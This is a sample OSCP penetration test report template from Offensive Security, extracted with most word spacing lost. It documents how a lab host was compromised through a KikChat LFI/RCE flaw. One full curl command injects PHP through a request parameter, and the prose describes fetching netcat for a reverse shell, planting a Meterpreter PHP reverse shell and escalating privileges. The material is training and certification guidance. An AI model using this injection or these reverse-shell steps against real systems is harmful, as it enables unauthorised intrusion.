Offensive Security | Page About this Document Submitting your course exercises, PWK lab report,...
Transcript of Offensive Security | Page About this Document Submitting your course exercises, PWK lab report,...
1|P a g e
OffensiveSecurityPenetrationTestReportforInternalLabandExam
v.1.1
OSID:XXXXX
©
AllrightsreservedtoOffensiveSecurity,2016
Nopartofthispublication,inwholeorinpart,maybereproduced,copied,transferredoranyotherrightreservedtoitscopyrightowner,
includingphotocopyingandallothercopying,anytransferortransmissionusinganynetworkorothermeansofcommunication,anybroadcast
fordistantlearning,inanyformorbyanymeanssuchasanyinformationstorage,transmissionorretrievalsystem,withoutpriorwritten
permissionfromOffensiveSecurity.
2|P a g e
AboutthisDocumentSubmitting your course exercises, PWK lab report, along with your exam report, may have its benefits. For example, up to 5 points may be earned by submitting your lab report along with your exercises. Although submitting your PWK lab report and the corresponding course exercises is completely optional, it is not difficult to see why it’s highly recommended to do so.
Thisdocumentisprovidedasanexampleofwhatisexpected,atminimum,inatypicallabreportthatissubmittedforreview.Youmustsuccessfullycompromisenolessthan10machinesinthelabsanddocumentallofyourstepsasillustratedinthe“OffensiveSecurityLabandExamPenetrationReport:Section3-Methodologies”template.Youmaychoosetoincludemorethan10machinesinyourreport,howeverthiswillnotprovideanyadditionalpointstoyourfinalexamscore.
Thesamplereportpresentedinthisdocumenthasbeenadaptedforthenon-nativeEnglishspeaker.Forthatreason,OffensiveSecurityhasoptedforamorevisual(i.e:morescreenshots)styleofreporting.Anarrativeofhowthemachinewascompromisedaswellasvulnerabilityinformationcanbeincludedinthereport,atyourdiscretion.Pleasenotethatthistemplateisonlyaguide,youmayoptnottouseitandcreateyourown.Thereport,regardlessofthetemplateused,mustbeclear,concise,andmostimportantly,itmustbereproducible.Inotherwords,wemustbeabletocompromisethemachineagainbysimplyfollowingthereport.
3|P a g e
TableofContents1.0OffensiveSecurityLabandExamPenetrationTestReport..............................................................4
1.1Introduction.......................................................................................................................................4
1.2Objective............................................................................................................................................4
1.3Requirements.....................................................................................................................................4
2.0Report–High-LevelSummary.........................................................................................................5
2.1Report-Recommendations...............................................................................................................5
3.0Report–Methodologies.................................................................................................................5
3.1Report–InformationGathering.........................................................................................................6
3.2Report–ServiceEnumeration...........................................................................................................6
3.3Report–Penetration..........................................................................................................................7
3.4Report–HouseCleaning..................................................................................................................14
4.0PWKCourseExercises...................................................................................................................14
4|P a g e
1.0OffensiveSecurityLabandExamPenetrationTestReport1.1IntroductionThe Offensive Security Lab and Exam penetration test report should contain all the steps taken to
successfullycompromisemachinesbothintheexamandlabenvironments.Accompanyingdatausedin
bothenvironmentsshouldalsobeincluded,suchasPoCs,customexploitcode,andsoon.Pleasenote
thatthisreportwillbegradedfromastandpointofcorrectnessandcompleteness.Thepurposeofthis
report is toensure that the studenthasa full understandingofpenetration testingmethodologiesas
well as the technical knowledge required to successfully achieve the Offensive Security Certified
Professional(OSCP)certification.
1.2ObjectiveTheobjectiveofthisassessmentistoperformaninternalpenetrationtestagainsttheOffensiveSecurity
LabandExamnetwork.Thestudentistaskedwithfollowingmethodicalapproachinobtainingaccessto
theobjectivegoals.Thistestshouldsimulateanactualpenetrationtestandhowyouwouldstartfrom
beginningtoend,includingtheoverallreport.Asamplepagehasbeenincludedinthisdocumentthat
shouldhelpyoudeterminewhatisexpectedofyoufromareportingstandpoint.Pleaseusethesample
reportasaguidetogetyouthroughthereportingrequirementofthecourse.
1.3RequirementsThestudentwillberequiredtocompletethispenetrationtestingreportinitsentiretyandtoincludethe
followingsections:
• OverallHigh-LevelSummaryandRecommendations(Non-technical)
• Methodologywalk-throughanddetailedoutlineofstepstaken
• Each findingwithaccompanying screenshots,walk-throughs, samplecode,andproof.txt file if
applicable.
• Anyadditionalitemsasdeemednecessary
5|P a g e
2.0Report–High-LevelSummaryOS-XXXXXwas taskedwithperformingan internalpenetration test in theOffensiveSecurity Labsand
Examnetwork.Aninternalpenetrationtestisasimulatedattackagainstinternallyconnectedsystems.
The focus of this test is to perform attacks, similar to those of a malicious entity, and attempt to
infiltrateOffensiveSecurity’sinternallabsystems–theTHINC.localdomain,andtheexamnetwork.OS-
XXXXX’s overall objective was to evaluate the network, identify systems, and exploit flaws while
reportingthefindingsbacktoOffensiveSecurity.
While conducting the internal penetration test, therewere several alarming vulnerabilities thatwere
identified within Offensive Security’s network. For example, OS-XXXXX was able to gain access to
multiplemachines,primarilyduetooutdatedpatchesandpoorsecurityconfigurations.Duringtesting,
OS-XXXXXhadadministrative levelaccess tomultiple systems.All systemsweresuccessfullyexploited
andaccessgranted.Thesesystemsaswellasabriefdescriptiononhowaccesswasobtainedarelisted
below:
• Target#1–Obtainedalow-privilegeshellviathevulnerablewebapplicationcalled'KikChat'.
Oncein,accesswasleveragedtoescalateto'root'usingthe'getsystem'commandin
Meterpreter.
2.1Report-RecommendationsOS-XXXXXrecommendspatchingthevulnerabilitiesidentifiedduringthepenetrationtesttoensurethat
anattacker cannotexploit these systems in the future.One thing to remember is that these systems
require frequent patching and once patched, should remain on a regular patch program in order to
mitigateadditionalvulnerabilitiesthatmaybediscoveredatalaterdate.
3.0Report–MethodologiesOS-XXXXX utilized a widely adopted approach to performing penetration testing that is effective in
testinghowwelltheOffensiveSecurityLabsandExamenvironmentsaresecure.Belowisasummaryof
howOS-XXXXXwasabletoidentifyandexploitanumberofsystems.
6|P a g e
3.1Report–InformationGatheringThe information gathering portion of a penetration test focuses on identifying the scope of the
penetration test.During thispenetration test,OS-XXXXXwas taskedwithexploiting the labandexam
network.ThespecificIPaddresseswere:
LabNetwork
192.168.31.218
3.2Report–ServiceEnumerationThe service enumeration portion of a penetration test focuses on gathering information about what
services are alive on a system or systems. This is valuable to an attacker as it provides detailed
informationonpotentialattackvectorsintoasystem.Understandingwhatapplicationsarerunningon
thesystemprovidesanattackerwithvitalinformationbeforeconductingtheactualpenetrationtest.In
somecases,someportsmaynotbelisted.
ServerIPAddress PortsOpen Service/Banner
192.168.31.218 TCP:80,3389 Apache/RDP
7|P a g e
3.3Report–PenetrationThe penetration testing portion of the assessment focuses heavily on gaining access to a variety of
systems.Duringthispenetrationtest,OS-XXXXXwasabletosuccessfullygainaccessto10outofthe50
systems.
VulnerabilityExploited:KikChat-(LFI/RCE)MultipleVulnerability
SystemVulnerable:192.168.31.218
VulnerabilityExplanation:TheKikChatwebapplicationsuffersfromaLocalFileInclude(LFI),aswellas
aRemoteCodeExecution(RCE)vulnerability.Acombinationofthesevulnerabilitieswasusedtoobtain
alowprivilegeshell.
PrivilegeEscalationVulnerability:Named Pipe Impersonation (In Memory/Admin)
VulnerabilityFix:Noknownpatchorupdateforthisissue.
Severity:Critical
InformationGathering:
9|P a g e
Contentoftarget’srobots.txt(usingcurl):
Furtherenumerationofport80usingabrowser:
SearchingExploit-DBforPoConKikChat’svulnerability:
10|P a g e
ProofOfConceptCode:https://www.exploit-db.com/exploits/30235/
ConfirmingRCE:UsingthePoCfromExploit-DB,additionalinformationaboutthewebserverisgathered
bycreatingaphpfilewith'phpinfo()',andviewingit.
Commandissuedfromterminal:
curl -s http://192.168.31.218/8678576453/rooms/get.php\?name\=info.php\&ROOM\="<?php+phpinfo()+?>"
Viewingcustomphpfileinthebrowser:
11|P a g e
GettingLow-Privilegeshell:
Using theRCEvulnerability,createaphp filecalled 'shell.php' thatwilldownload 'nc.txt'.Save itasa
batchfile,create'nc.exe'andconnectbacktoattacker:
Hosting'nc.txt'file:
RCEcommandtodownload'nc.txt',run'shell.php',andconnecttoattackingmachine:
Listeneronattackingmachine:
12|P a g e
PrivilegeEscalation:UsingMetasploit,ameterpreterphpreverseshelliscreated.Oncecreated,itisthenuploadedtothetargetmachinethesamewayasthe'nc.txt'file,andthenitisexecutedusing'curl'.
CreatingMeterpreterPHPreverseshell:
Hosting&executingmaliciousfile:
14|P a g e
Prooffile:
3.4Report–HouseCleaningThe house-cleaning portion of the assessment ensures that remnants of the penetration test are
removed.Oftentimes,fragmentsoftoolsoruseraccountsareleftonanorganization’scomputer,which
can cause security issues down the road. Ensuring that we are meticulous and no remnants of our
penetrationtestareleftoverisparamountimportance.
Aftertheobjectivesonboththelabnetworkandexamnetworkweresuccessfullycompleted,OS-XXXXX
removedalluseraccountsandpasswordsaswellastheMeterpreterservices installedonthesystem.
OffensiveSecurityshouldnothavetoremoveanyuseraccountsorservicesfromanyofthesystems.
4.0PWKCoursesExercisesCourseexercisesaretobedocumented,andaddedinthissectionofthereport.